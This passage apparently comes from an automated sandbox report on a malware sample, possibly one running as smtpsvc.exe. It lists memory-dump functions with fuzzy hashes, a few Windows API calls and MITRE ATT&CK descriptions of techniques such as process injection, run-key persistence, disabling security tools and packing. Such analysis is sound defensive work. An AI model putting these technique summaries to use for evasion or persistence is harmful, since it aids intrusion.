Instruction ID: a9a92d4335f8408c959ccb2fe8debb198de398b327ce7c4c5ea165f1d5abc573
Opcode Fuzzy Hash: 5c64c6a78957a49c0bbd15a3b489030be37f80d4f573bfa9964f892d6f436f48
Instruction Fuzzy Hash: 1511C431B001449FC705D7F4D45499D7BF9EF85610F2480A6D509EB691CB389E428B91

Uniqueness

Uniqueness Score: -1.00%

Function 003A0CB0, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325820528.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f372a9728417599969000720a525dcfdef630b3ccd2c5b8b4ea79c80ad22b4b5
Instruction ID: d67c81f51cb9ccc6bf9765beacd899a6aa25e9c134ca42799c32d68f3399b691
Opcode Fuzzy Hash: f372a9728417599969000720a525dcfdef630b3ccd2c5b8b4ea79c80ad22b4b5
Instruction Fuzzy Hash: 47F0F4317082911FD70667796C2466F7FE6DFDA314B24487FE109C7392CA754C058751

Uniqueness

Uniqueness Score: -1.00%

Function 009907FF, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325911384.0000000000990000.00000040.00000040.sdmp, Offset: 00990000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68df454adb4cf3aaf8062e4b8e22d18f031acea113df9b9ad2adce499c164678
Instruction ID: a65f566f5c29393e3ebedabb235e8ad0cce2a89ad748f65828d0be857521947c
Opcode Fuzzy Hash: 68df454adb4cf3aaf8062e4b8e22d18f031acea113df9b9ad2adce499c164678
Instruction Fuzzy Hash: 21F0A9B65093805FD7118B059C40863FFA8EA86660749C0AFEC498B612D125A908C771

Uniqueness

Uniqueness Score: -1.00%

Function 003A0CC0, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325820528.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7069248ec4770e81bb505d4baa0ac6f368b0dadda92f22e12035da4e7a23ed65
Instruction ID: 634bdf4df2f5cc605b53961b684b9c94857d8e9e736acad0a75f3c3382ac7e71
Opcode Fuzzy Hash: 7069248ec4770e81bb505d4baa0ac6f368b0dadda92f22e12035da4e7a23ed65
Instruction Fuzzy Hash: 5BF027327002141BDB0866BEAC1472F76DFEBCA314B10843AE51DC7391DD758C0542A0

Uniqueness

Uniqueness Score: -1.00%

Function 003A14E8, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325820528.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96801cdbde3f8299c417b5e17207ea52de4d0dde3a56179b2537392b492f5580
Instruction ID: f9bdda24bd9a4045af0f15d6afeaabf858b7c0fab2cf05d9ef194426bb6addd7
Opcode Fuzzy Hash: 96801cdbde3f8299c417b5e17207ea52de4d0dde3a56179b2537392b492f5580
Instruction Fuzzy Hash: 31F01C357001118FCB49AB7DD45892E37EBABCE665329446AE407CBB60DE70DC028B91

Uniqueness

Uniqueness Score: -1.00%

Function 003A1540, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325820528.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf57298538316ac3fbfb3aac976c5602c67172541e66bffbb7c4c45fa8eb4632
Instruction ID: dff5c9a10cbe4c2c959015f2e0b91940d2ed9a37b957d078b5fe346018a4b2f9
Opcode Fuzzy Hash: cf57298538316ac3fbfb3aac976c5602c67172541e66bffbb7c4c45fa8eb4632
Instruction Fuzzy Hash: 2EF0E23560A2909FD702877DA8809EA7FF8EFDB21031806ABE009C7212C5711C01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003A0070, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325820528.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4914c607ed9d9690d1a351454e61163854471e1a30bd416a274d6f535f0896c
Instruction ID: 6efef2fdbd70f60215e35a25627c2e1828ca4858b7f59f0663ab5f9e0146bd75
Opcode Fuzzy Hash: d4914c607ed9d9690d1a351454e61163854471e1a30bd416a274d6f535f0896c
Instruction Fuzzy Hash: 5BE0ED36604259AF8B08DFE5FC8C5EEBFEAEB84261B008066F519D7510EA3156858B94

Uniqueness

Uniqueness Score: -1.00%

Function 0099081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325911384.0000000000990000.00000040.00000040.sdmp, Offset: 00990000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5823780245fbf521faad16c11c38ca55b2a2e03359212fefe4c822a3ef80f6
Instruction ID: 61129f93d81cba1ba237a877e300676f999a37903e184b461fdf07cbd68eb251
Opcode Fuzzy Hash: 5b5823780245fbf521faad16c11c38ca55b2a2e03359212fefe4c822a3ef80f6
Instruction Fuzzy Hash: 10E092B66017048BD750CF0AEC41862F7D4EB84A30B08C07FDC0E8B700D13AB508CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 003A0D29, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325820528.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d696e670453fc1a6ba986cb138f7940db5f982b599beb2c8bbfe60b368699427
Instruction ID: e8c7c0b10cd4909f8af5a3b64559831b47cb3c5ac82632e90791a6fbd9cc24a3
Opcode Fuzzy Hash: d696e670453fc1a6ba986cb138f7940db5f982b599beb2c8bbfe60b368699427
Instruction Fuzzy Hash: 62E0C2315082E08FCB139BB8A8949DD7FB0DE0B64075501DBD489DB0A2D720AD2CCB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325760943.00000000001D2000.00000040.00000001.sdmp, Offset: 001D2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39dfa7128b2acb75d8030558158b174f3740998424cfbf88eeb6e47e18d2be8e
Instruction ID: 02ff0cdce98529822da53f30466eeadf0da6740882ace10c0c8bca69b6c404d7
Opcode Fuzzy Hash: 39dfa7128b2acb75d8030558158b174f3740998424cfbf88eeb6e47e18d2be8e
Instruction Fuzzy Hash: A6D05E79305A818FD7178A1CC1A4B9537D4AB61B04F5644FAEC00CB7A3C778E981D200

Uniqueness

Uniqueness Score: -1.00%

Function 001D23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325760943.00000000001D2000.00000040.00000001.sdmp, Offset: 001D2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f2e23f7e3e1b56a20dde9cc6c179277f01071de3ea40b7e0bf0eb3447357ae
Instruction ID: 985cbe5267afaf61143af63ad4ddd529ba5b3764339c6a812c04db7e31fd77f0
Opcode Fuzzy Hash: f6f2e23f7e3e1b56a20dde9cc6c179277f01071de3ea40b7e0bf0eb3447357ae
Instruction Fuzzy Hash: C5D05E343006818BDB15CA0CC294F5973E4BB94700F0644E9FC108B366C3B8EC80C600

Uniqueness

Uniqueness Score: -1.00%

Function 003A14B5, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2325820528.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2660afcd75c5f6e145c454a69cfcf8384deee35fd85e457e4f002596c84eaf40
Instruction ID: 44c5bee1b30e7ead97d080bef2519094c933f7b8eb0f24ab4ba09150c06b7b94
Opcode Fuzzy Hash: 2660afcd75c5f6e145c454a69cfcf8384deee35fd85e457e4f002596c84eaf40
Instruction Fuzzy Hash: 16C04C3BF012448BDE1467E8B8495DCB352D7C4165B544562DA19C7540D93589258651

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: smtpsvc.exe PID: 2560 Parent PID: 1388 smtpsvc.exeCOMMON

Executed Functions

Function 002701B7, Relevance: 5.6, Strings: 4, Instructions: 574COMMON

Download Yara Rule

Strings

_qq, xrefs: 002707C3
:@lq, xrefs: 00270205
:@lq, xrefs: 0027074B
:@lq, xrefs: 00270977

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID: _qq$:@lq$:@lq$:@lq
API String ID: 0-3995742030
Opcode ID: 61c8870c049af625ef06f3734a5222e0f6e8e8c424eb15d8380c0b33d2dd6bd7
Instruction ID: ac960e946eb49e421f6cdf4ef6a65ecba243c526fab2510133a4d4d2f294baea
Opcode Fuzzy Hash: 61c8870c049af625ef06f3734a5222e0f6e8e8c424eb15d8380c0b33d2dd6bd7
Instruction Fuzzy Hash: F4326B30610206DFDB14EF68C8D4B6AB7F2BF89304F64C968D5499B259DB70EC99CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00270710, Relevance: 5.5, Strings: 4, Instructions: 457COMMON

Download Yara Rule

Strings

_qq, xrefs: 002707C3
:@lq, xrefs: 00270AE2
:@lq, xrefs: 0027074B
:@lq, xrefs: 00270977

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID: _qq$:@lq$:@lq$:@lq
API String ID: 0-3995742030
Opcode ID: 7ba9226c543dea69527c3938fe98c3c73931c90bc3000875dbf7914ce32aadd4
Instruction ID: d64f0ce309fe100a17ee4910f70695a7a122af1df5fd39bc9f3e4e6c52a0995a
Opcode Fuzzy Hash: 7ba9226c543dea69527c3938fe98c3c73931c90bc3000875dbf7914ce32aadd4
Instruction Fuzzy Hash: 53028C30A00216DFCB15DF68C890A6EB7E6AF89304F14C569D9499B396DB30EC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019A4AA, Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,A2498788,00000000,00000000,00000000,00000000), ref: 0019A53D

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 2409fc035b0e23ac1d86d0ca4ae2ead8aa1369152ea731fa70413b3bc09b9a93
Instruction ID: 108e58e3515e8a65545992cf602935c3ab0e157aa882b00253d6922a346e2017
Opcode Fuzzy Hash: 2409fc035b0e23ac1d86d0ca4ae2ead8aa1369152ea731fa70413b3bc09b9a93
Instruction Fuzzy Hash: 28218371409380AFEB228F619C45F96BFB8EF46310F0985DBE9849B193D265A909C772

Uniqueness

Uniqueness Score: -1.00%

Function 0019A1F4, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0019A269

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 92bec6ec0f36b82a3b3a3cdf3210faa2bc5baaa6e4ae5db3fe2d6598613846c8
Instruction ID: 08461349f06be964259712aed9ab4967a0e327caf4c05b9e0e1e4fb655d42b27
Opcode Fuzzy Hash: 92bec6ec0f36b82a3b3a3cdf3210faa2bc5baaa6e4ae5db3fe2d6598613846c8
Instruction Fuzzy Hash: 9B21907540D7C09FD7138B298C95652BFB0EF03220F0E81DBD9848F1A3D3699909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019A4DE, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,A2498788,00000000,00000000,00000000,00000000), ref: 0019A53D

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e5db7b5ed88532fad02e40efc20f02af4a7c9ff4906de51a6861cc9007184e6b
Instruction ID: 341a9ffff02d3ae6c8501777140b71b3693c2811bba8288118277202b819e530
Opcode Fuzzy Hash: e5db7b5ed88532fad02e40efc20f02af4a7c9ff4906de51a6861cc9007184e6b
Instruction Fuzzy Hash: 2A110172500300EFFB21CF55DC80FA6FBE8EF04320F04856AFA489A141C731A9088BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0019A2A3, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0019A2FC

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 8576eae90e87809df330e96bfb52306385d3a102ca6b2317a917f867d59b3aff
Instruction ID: 6e8b85f5c10b764afaa04b28dd3dba93ea7f47b7eef11b929deed09c07d83917
Opcode Fuzzy Hash: 8576eae90e87809df330e96bfb52306385d3a102ca6b2317a917f867d59b3aff
Instruction Fuzzy Hash: 4711A0715093C09FDB128B25DC85A52BFF4EF06220F0984DBED858B263C275A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019A2CA, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0019A2FC

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 6b311403a07e0741a3c9af26be6e8a43cf5d74a096d78f32b9f81fa314e31a0b
Instruction ID: 9f7695d8cd2d3b8593209095373241292cb58a4eb178f56add28e104405ac783
Opcode Fuzzy Hash: 6b311403a07e0741a3c9af26be6e8a43cf5d74a096d78f32b9f81fa314e31a0b
Instruction Fuzzy Hash: BF01FF35600740CFEF208F19DC89766FBA4EF01321F88C0AADD098B752D375E948DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019A23A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0019A269

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: b6da5e455fc229457e02ae72785a5087021b2927e51f6f18aef587f819981af4
Instruction ID: 76ca544bea13311095724b3ee54f23793d7630329b260c96f3a75b61ab9b51f9
Opcode Fuzzy Hash: b6da5e455fc229457e02ae72785a5087021b2927e51f6f18aef587f819981af4
Instruction Fuzzy Hash: FEF0CD35904744CFEF10CF09D889761FFA0EF41721F98C0AADD094B202D37AA948CAA3

Uniqueness

Uniqueness Score: -1.00%

Function 0019A336, Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0019A39C

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 194c848baef3d0a3d5ab734aaa251a9b1ddb2a3c34d1443bf4340d2538ccfe8e
Instruction ID: 28e57303ffa514b463b07c7c9b15dedba2e30f07a04b0c3dfe78d3ccc4f55aaa
Opcode Fuzzy Hash: 194c848baef3d0a3d5ab734aaa251a9b1ddb2a3c34d1443bf4340d2538ccfe8e
Instruction Fuzzy Hash: C4216D755093C49FD7128B25DC85A92BFB4EF02220F0984EBDD85CF163C279A948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019A36A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0019A39C

Memory Dump Source

Source File: 00000014.00000002.2355521302.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 268be3fb5df119b62db1889b1d4a0f9282b2de6e94c6242bc691527714a9f83c
Instruction ID: 1065435baba5d1ee91781084edeb8caabf31fc89679b93022d70fcb544c97693
Opcode Fuzzy Hash: 268be3fb5df119b62db1889b1d4a0f9282b2de6e94c6242bc691527714a9f83c
Instruction Fuzzy Hash: 4501FD75600340CFEF20CF29DC857A6FBE4EF00321F48C0AADD098B642D775A908DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 002700B9, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5117f38e8320faf11b5290af2f37e7df918d95a5ae7086a827f99fe1cad9a60e
Instruction ID: 1975cd1d8fd481230770c334ce2795866eee0ac4fa1f62bacd5840b9c99983f4
Opcode Fuzzy Hash: 5117f38e8320faf11b5290af2f37e7df918d95a5ae7086a827f99fe1cad9a60e
Instruction Fuzzy Hash: 2A212E30705201CFCB15AB7CC068A6D77E7AF86311B1485B9D41ACB3A2DE35DC49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00270006, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aabcda7016e295c10c93ccdab00af33c4a81915845bc52756ab30ebc938e0b13
Instruction ID: e1de33a46fef36e4b4cfd9c4f07ed42df901d40b6556cfa40e5af1d94ed3d63f
Opcode Fuzzy Hash: aabcda7016e295c10c93ccdab00af33c4a81915845bc52756ab30ebc938e0b13
Instruction Fuzzy Hash: F021ED2151E3D29FCB138B709CA59997FB09E4321070E85DBD0C5CF0A3D2688949CB63

Uniqueness

Uniqueness Score: -1.00%

Function 00270DA0, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4e12f0ecfbf4d1082be0f758a3fe1dd1c2c0735d3b6e4ded41ab0dc98d3e76
Instruction ID: 6f908ddd8c7f7c598bdb6c4bdad3d99b94a3efc201234f29ccad97be4498ae3e
Opcode Fuzzy Hash: 7c4e12f0ecfbf4d1082be0f758a3fe1dd1c2c0735d3b6e4ded41ab0dc98d3e76
Instruction Fuzzy Hash: 74112B30B043459FC702EBB4C81558DBFB9EF86610F1484EAD009DB692DF389E05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AF07F7, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2356155456.0000000000AF0000.00000040.00000040.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801121636df9bf51d71876470c2191210b4705e54b807f70e87623251d70110d
Instruction ID: af1ff3f99131d1b7d62de2c72c1b2f4c27ca5fde0f63558455432b3c97f0617d
Opcode Fuzzy Hash: 801121636df9bf51d71876470c2191210b4705e54b807f70e87623251d70110d
Instruction Fuzzy Hash: 2801F9B65097805FDB01CF059C40863FFF8EE86620708C09FEC498B612D125B905CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00270D19, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7970f6e2d273b8f9f220cc632ce894b71b2cb37d226fbad588e324b6002d70d5
Instruction ID: e14758a46d5659a821e591ee7305762c47d4efe7209d7ebf30c81c5f6d73e262
Opcode Fuzzy Hash: 7970f6e2d273b8f9f220cc632ce894b71b2cb37d226fbad588e324b6002d70d5
Instruction Fuzzy Hash: 26F022317082901FDB0917796C206AF6FE6DFCB300B15447AE049CB3A3CD314C0683A1

Uniqueness

Uniqueness Score: -1.00%

Function 00270CC8, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32cabbee73677dd83c52927ce3f234a5ccaa39a1d40b12613358e27b60786796
Instruction ID: f8aa5790d7168b2b8929f8bc8fbbd8d65bf2907c3744c3419dd52dcde0faa84c
Opcode Fuzzy Hash: 32cabbee73677dd83c52927ce3f234a5ccaa39a1d40b12613358e27b60786796
Instruction Fuzzy Hash: AEF08C316192C48FC712EBB8E468B913FE9DF0B254F0905E6E144CB26BCB20AC88C791

Uniqueness

Uniqueness Score: -1.00%

Function 00270070, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba1fdca4f9c6a8da7b98d868c8b7e151b149c2bf48e96f349cd32b8717e80c0
Instruction ID: 70b092762a9a61b8a4affdc123d3847f7592a7d048e3ca938ecdc5d7f87ff1f9
Opcode Fuzzy Hash: 9ba1fdca4f9c6a8da7b98d868c8b7e151b149c2bf48e96f349cd32b8717e80c0
Instruction Fuzzy Hash: 62E09232604309EF8B04EFA5FC485DEBFFAEF84261B008166F50DC2510EB3166958B84

Uniqueness

Uniqueness Score: -1.00%

Function 00AF081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2356155456.0000000000AF0000.00000040.00000040.sdmp, Offset: 00AF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdf58915f9b0fe75c8a1216f8600e286d9110b2057267dff151da5fa3fbf20dc
Instruction ID: 9b8aadd5e73c5d15b7a17a6c7a0ea7081f0cd54e5a6f1a5a2a3d12fc3459efaa
Opcode Fuzzy Hash: cdf58915f9b0fe75c8a1216f8600e286d9110b2057267dff151da5fa3fbf20dc
Instruction Fuzzy Hash: 60E092766007048BDB50CF0AEC81452F7D4EB84A31B08C07FDD0D8B700D136B504CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00270D90, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355661549.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9c1545bc53f4b93fcad6655965c076bb5cf3fad686e740ccf53f6865e16449
Instruction ID: 088a13a777664ad8a2e182a695845bfb67ab1dbeabadbec661e9c371388b829f
Opcode Fuzzy Hash: dc9c1545bc53f4b93fcad6655965c076bb5cf3fad686e740ccf53f6865e16449
Instruction Fuzzy Hash: B8E08C2190C2E08FCB234BB968684E93F708E07110B4802DAC4C59B5A2E650592DC352

Uniqueness

Uniqueness Score: -1.00%

Function 001923F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355503496.0000000000192000.00000040.00000001.sdmp, Offset: 00192000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11fb2de37d2db66c5b39ece0abe10a75bd775fefab27d879a5504eb57649e2a8
Instruction ID: dff4f7f26e079170dee77cc646379ab9c83adbb2c5d1be2221528debd9a74779
Opcode Fuzzy Hash: 11fb2de37d2db66c5b39ece0abe10a75bd775fefab27d879a5504eb57649e2a8
Instruction Fuzzy Hash: 94D05E79304A819FDB168A1CC1A4B9537D4BB61B04F5644F9E800CB6A3C778E981D200

Uniqueness

Uniqueness Score: -1.00%

Function 001923BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2355503496.0000000000192000.00000040.00000001.sdmp, Offset: 00192000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f7f3da7b99dfaaf4af471cdb02b118a5c0e5e324a61fd48bc85089566941e5
Instruction ID: 50564fb2bbcb1a7b90b4fbd212724361b12756776924f7930441e53406d01efb
Opcode Fuzzy Hash: 96f7f3da7b99dfaaf4af471cdb02b118a5c0e5e324a61fd48bc85089566941e5
Instruction Fuzzy Hash: 02D09E743406819BDB15DA1CD694F5977E4BB44704F1644E9FC108B666C7B8ED81D640

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

